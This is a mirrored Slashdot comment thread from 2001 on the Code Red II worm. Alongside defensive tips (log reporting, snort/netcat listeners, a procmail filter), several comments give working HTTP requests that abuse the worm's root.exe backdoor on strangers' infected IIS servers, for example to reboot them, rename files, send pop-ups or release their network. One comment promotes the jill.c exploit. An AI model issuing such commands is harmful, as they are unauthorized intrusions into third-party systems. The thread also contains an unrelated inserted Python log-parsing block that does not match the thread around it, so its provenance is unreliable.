Slashdot Mirror


Code Red II: Shells for the Taking

sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accessible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

19 of 602 comments

  1. Help track this: submit your logs to dshield! by mjh · · Score: 5, Informative
    You might want to consider submitting your apache logs to dshield. This will help keep track of the extent of this problem as well as help to analyze where it may have originated. If the dshield folks can correlate the earliest attacks of the latest variant, they have a chance at finding where this thing originated.

    Submissions can be made by following these instructions.

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    1. Re:Help track this: submit your logs to dshield! by LinuxHam · · Score: 4, Informative

      It uses libpcap to sniff all packets that the interface receives. And if you configure snort to use promiscuous mode, then it'll even track attacks that aren't directed towards your machine.

      I'm on 56k ppp dialup, so I shouldn't see any attacks (let alone packets) not destined for my machine. Now that you know that, you should also know that I was rejecting all connections to port 80 with ipchains. Therefore, since the worm couldn't connect, it wouldn't transmit the HTTP request that snort is watching for.

      By hanging netcat on port 80 with a 3 second connect limit using xinetd, all inbound port 80 probes get connections. They send their payload, snort alerts on it, netcat routes it directly to /dev/null, and then closes the connection. No huge apache logs, or whatever minimal risks are associated with apache.

      I shunt the payloads directly to /dev/null just so snort can actually watch them coming in. I literally asked for a "dummy listener" on the snort list, and they pointed me to netcat at l0pht.

      --
      Intelligent Life on Earth
  2. Killing small ISPs by Alien54 · · Score: 5, Informative
    I know of at least one small ISP that had very serious problems this week.

    First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.

    Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.

    BOOM!

    If this keeps happening, this is going to be bad for business in a lot of places.

    --
    "It is a greater offense to steal men's labor, than their clothes"
  3. This will put a bandaid on the problem: by Telek · · Score: 2, Informative

    try this:

    GET /scripts/root.exe?/c+echo+ren+root.exe+badrootexploit+>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+attrib.exe+root.exe+%u002Br+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+fixme.cmd HTTP/1.0

    this way it renames the old root.exe, creates a new dummy one, and write protects it so it can't be overwritten by a simple copy command.

    --

    If God gave us curiosity
  4. Re:huge cable modem hits by iturbide · · Score: 2, Informative
    OK, You can use tcpdump and/or ethereal to check traffic over your interface. Be ready for rpm dependency resolution hell, but any decent distro should have all the necessary packages. Ethereal is the damned good GUI thing sitting on top of tcpdump, and it will tell you straightaway what is going on.

    And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.

    Enjoy

  5. SirCam procmail recipe by tstock · · Score: 2, Informative

    :0 B
    * > 100000
    * mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6HDo8OkQ6SD
    /dev/null

  6. Mountain Dew: Code Red by Spaztek · · Score: 2, Informative

    Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syrup, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which aren't windows machines. I guess linux is like the caffeine of all soda. The good parts :-)

    --
    "If a man watches 3 football games in a row he should be declared legally dead" - A
  7. Securityfocus asks for IPs by mawis · · Score: 5, Informative

    To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310

  8. The Whitehouse.gov lesson by Anonymous Coward · · Score: 0, Informative
    It was clear, when the first version of Code Red was released, that whitehouse.gov was the intended target of a Distributed Denial Of Service attack.

    They got lucky when the hacker messed up (he used a hard IP instead of a domain name). What did they do in response?

    What did the whitehouse.gov admins do once they realized that they were a clear target? Write angry but useless letters to microsoft? Call Bill Gates and piss and moan?

    NO! They took a PRO-ACTIVE reaction to a threat of clear and imminent danger to information distribution and installed Linux.

    www.whitehouse.gov is there a lesson there?

  9. Re:File download script by Xemu · · Score: 2, Informative
    Also, I was unable to figure out a way to get the machines to reboot or restart IIS


    Rebooting a compromised IIS server is trivial, just add this to your script

    (echo "GET /scripts/root.exe?/c+iisreset+/reboot HTTP/1.0\n\n\n\n" ; sleep 5) | telnet $1 80

    or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system.

    --
    Tell your friends about xenu.net
  10. A Warning to Whitehats by Ms.Taken · · Score: 5, Informative
    Anyone working on scripts which respond to Code Red attacks by patching the originating server should read this cnet article, which calls that approach 'hack-back'.

    From the article:

    The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."

    It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.

  11. Re: How to be a nicer guy by Anonymous Coward · · Score: 1, Informative

    http://IP.IP.IP.IP/scripts/root.exe?+/c+start+%20http://www.digitalisland.com/codered/

    Find & run websnarf.pl or grab the IP's off your web logs, run this on the IP of whoever attacks with v2 (XXXXXXXXXXXXXXXXXX) and you're set. It's easier, I think, since it gives them more info (starts their browser & points them to info on CR, though I wish it had more info on how to remove the *trojan* which will not disappear with the patch :/ since it also creates the /c and /d aliases to *keep* them infected...)

    I do wish we could autopatch these, but this is the next best thing, since it's not harmful (unlike the format c: ideas some are having... *sigh* ...)

    If someone comes up with an autopatch script which grabs the logs from websnarf, then telnets in & fixes them up, I'm open to ideas here...

  12. This looks big time by JerkyBoy · · Score: 2, Informative

    Holy crap. http://www.msnbc.com/news/606910.asp

    --

    Always do right. This will gratify some people and astonish the rest. -- Mark Twain
  13. Re:Code Red Infects Slashdot! by Umanity · · Score: 2, Informative

    Notice that this article was written before the appearance of CR2, the more virulent version of Code Red. I too believed that the worm was "Overhyped" in the media. But as of yesterday, I saw a four-fold increase in the attacks from the worm. I think the new version could be quite a problem. I have been tracking down systems infecting others and calling the sysadmin. I think we need to pro-actively stop this thing by alerting sysadmins that their machines are compromised.

    I have noticed that a lot of the recent hits have been coming from my Service Provider's address space. And the frequency of attacks is increasing. On the 2nd of August I only got about 30 hits, about 1 every hour. On the 4th of August I got over 80 hits, that's about 4 hits an hour.

    This thing is gaining momentum... Don't be foolish and underestimate it...

    --

    Michael A. Uman
    Sr Software Engineer
    softwaremagic.net
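    As an added example (not code from any of the posters, dshield or SecurityFocus), a small Python script that does the log-side work mjh, mawis and Umanity describe: it picks the worm probes out of an Apache access log by the request paths the thread ties to the worm, counts hits per hour, lists distinct source addresses, and emits one IP-plus-timestamp line per probe. The log lines are constructed, and the report layout is an assumption about what the robot address wants.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample Apache combined-log lines (not from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [04/Aug/2001:10:02:11 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 276 "-" "-"
192.0.2.10 - - [04/Aug/2001:10:02:14 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
198.51.100.7 - - [04/Aug/2001:10:40:01 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Aug/2001:11:15:33 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
203.0.113.5 - - [04/Aug/2001:11:59:59 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
"""

# Request paths the thread ties to the worm.
WORM_PATHS = [
    re.compile(r"^/default\.ida\?X{8,}", re.I),           # overflow probe padded with X
    re.compile(r"^/scripts/root\.exe", re.I),              # cmd.exe dropped as root.exe
    re.compile(r"^/[cd]/winnt/system32/cmd\.exe", re.I),   # the /c and /d aliases it adds
]

# Apache combined log: client IP, timestamp in brackets, then the request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')

def parse_worm_hits(log_text):
    """Return (ip, timestamp, path) for every request matching a worm signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole run
        ip, stamp, _method, path = m.groups()
        if any(p.match(path) for p in WORM_PATHS):
            ts = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
            hits.append((ip, ts, path))
    return hits

def hits_per_hour(hits):
    """Probes per clock hour, the rate Umanity tracks above."""
    return Counter(ts.strftime("%Y-%m-%d %H") for _ip, ts, _path in hits)

def unique_sources(hits):
    """Distinct attacking addresses, the 'unique addresses' tally seen in the thread."""
    return sorted({ip for ip, _ts, _path in hits})

def report_lines(hits):
    """One 'IP date time' line per probe. The exact layout the SecurityFocus robot
    wants is an assumption here; check the announcement it links before mailing."""
    return [f"{ip} {ts:%Y-%m-%d %H:%M:%S %z}" for ip, ts, _path in hits]
```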

  14. New Sites report on CR2 by stuccoguy · · Score: 4, Informative
    CNN has very little to say about the subject.

    MSNBC has a longer story.

    Fox News has a few words to say.

    ABC copied the AP story.

    CBS still seems to think the red tide is receding.

    Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.

  15. Try this by jsse · · Score: 3, Informative

    jill.c. Don't regard it as a malicious exploit, it's in fact a very powerful remote administration tool. All our NT boxes are not attached to the Internet so we don't worry. :)

  16. How to send a message to the poor bastards by Brian+Stretch · · Score: 4, Informative

    A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:

    http://ipaddress/c/inetpub/scripts/root.exe?/c+net+send+%25COMPUTERNAME%25+You+have+been+infected+by+the+Code+Red+II+Worm+which+attempted+to+attack+my+server

    %25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as the title:

    CGI Error

    The specified CGI application misbehaved by not returning a complete set
    of HTTP headers. The headers it did return are:

    and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.

    The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.

    1. Re:How to send a message to the poor bastards by Anonymous Coward · · Score: 1, Informative

      I had trouble getting root.exe to actually run any other program. I was able to execute commands interpreted by the shell (dir, echo, etc.), but not run any other program. The solution to this was to copy the program you want to run to the scripts directory ('copy' is a shell interpreted command), and then do a GET directly against the program, like so:

      GET /scripts/root.exe?+/c+copy+c:\winnt\system32\ipconfig.exe+. HTTP/1.0
      GET /scripts/ipconfig.exe?+/release HTTP/1.0

      Something similar would probably be required to get net.exe to run. BTW, the above doesn't work to shut down their network. Apparently the scripts aren't run with enough permission to do that. Also tried the same with iisreset /stop.

  17. List of CodeRed IPs here by leonbrooks · · Score: 3, Informative
    This sorted list (updated hourly) contains the IPs for CodeRed attacks on a single IP address in Western Australia.

    Last week: 92

    Last 32 hours: 196 (175 unique addresses)

    Looks like it's concrete bunker time soon... )-:

    --
    Got time? Spend some of it coding or testing